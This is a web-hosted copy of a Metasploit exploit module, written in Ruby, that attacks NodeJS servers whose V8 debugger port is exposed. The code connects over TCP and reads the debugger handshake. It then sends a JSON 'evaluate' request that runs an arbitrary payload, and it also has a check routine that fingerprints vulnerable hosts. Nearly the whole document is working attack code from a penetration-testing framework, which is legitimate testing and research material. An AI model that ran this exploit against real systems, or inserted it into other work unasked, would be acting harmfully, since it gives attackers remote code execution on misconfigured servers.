Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/nodejs_v8_debugger.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "NodeJS Debugger Command Injection",

18
        'Description' => %q{

19
          This module uses the "evaluate" request type of the NodeJS V8

20
          debugger protocol (version 1) to evaluate arbitrary JS and

21
          call out to other system commands. The port (default 5858) is

22
          not exposed non-locally in default configurations, but may be

23
          exposed either intentionally or via misconfiguration.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],

27
        'References' => [

28
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],

29
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]

30
        ],

31
        'Targets' => [

32
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],

33
        ],

34
        'Privileged' => false,

35
        'DisclosureDate' => '2016-08-15',

36
        'DefaultTarget' => 0,

37
        'Notes' => {

38
          'Reliability' => UNKNOWN_RELIABILITY,

39
          'Stability' => UNKNOWN_STABILITY,

40
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        Opt::RPORT(5858)

48
      ]

49
    )

50
  end

51


52
  def make_eval_message

53
    msg_body = {

54
      seq: 1,

55
      type: 'request',

56
      command: 'evaluate',

57
      arguments: {

58
        expression: payload.encoded,

59
        global: true,

60
        maxStringLength: -1

61
      }

62
    }.to_json

63
    msg_header = MESSAGE_HEADER_TEMPLATE % { :length => msg_body.length }

64
    msg_header + msg_body

65
  end

66


67
  def check

68
    connect

69
    res = sock.get_once

70
    disconnect

71


72
    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"

73
      vprint_status("Got debugger handshake:\n#{res}")

74
      return Exploit::CheckCode::Appears

75
    end

76


77
    Exploit::CheckCode::Unknown

78
  end

79


80
  def exploit

81
    connect

82
    # must consume incoming handshake before sending payload

83
    buf = sock.get_once

84
    msg = make_eval_message

85
    print_status("Sending #{msg.length} byte payload...")

86
    vprint_status("#{msg}")

87
    sock.put(msg)

88
    buf = sock.get_once

89


90
    if buf.include? '"command":"evaluate","success":true'

91
      print_status("Got success response")

92
    elsif buf.include? '"command":"evaluate","success":false'

93
      print_error("Got failure response: #{buf}")

94
    else

95
      print_error("Got unexpected response: #{buf}")

96
    end

97
  end

98


99
end

100


101